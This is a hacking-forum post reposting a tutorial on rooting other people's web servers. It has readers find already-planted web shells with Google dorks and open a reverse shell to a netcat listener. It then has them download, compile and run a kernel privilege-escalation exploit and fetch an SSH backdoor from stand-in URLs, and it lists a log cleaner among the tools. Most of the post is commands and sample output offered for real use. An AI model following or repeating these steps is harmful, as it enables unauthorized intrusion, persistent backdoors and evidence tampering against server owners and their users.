Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rooting a Web Server with Netcat and a Shell
#1
Here's a simple tutorial I found on the internet, I didn't write it myself. I tried to correct most grammar errors, but let me know if I missed any. It relies on third party exploits and a shell, so don't expect much from it. But please reply/thank.

[spoiler]
Things You Need:
# A Shell on a Website
# An Exploit
# Log cleaner
# SSH Backdoor
# Netcat

Use Google Dorks to find shells.
Once you find a shell, open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com


Compiling & executing exploits


Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
[email protected] /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving http://www.exploitsite.net... 199.58.192.192
Connecting to http://www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]


Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

Type "su" to get full privileges!


Installing Backdoors
type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then type,
Code:
unzip Sshdoor.zip
cd sshdoor
./run [i]<ENTER PASSWORD HERE> <ENTER PORT HERE>[/i]


Now connect with PuTTy and enjoy root privileges.


Methods to execute exploits written in other languages:
C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits
---------------
perl exploit.pl
---------------

Python
------------------
python exploit.py
------------------

PHP
-----------------
php exploit.php
-----------------
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)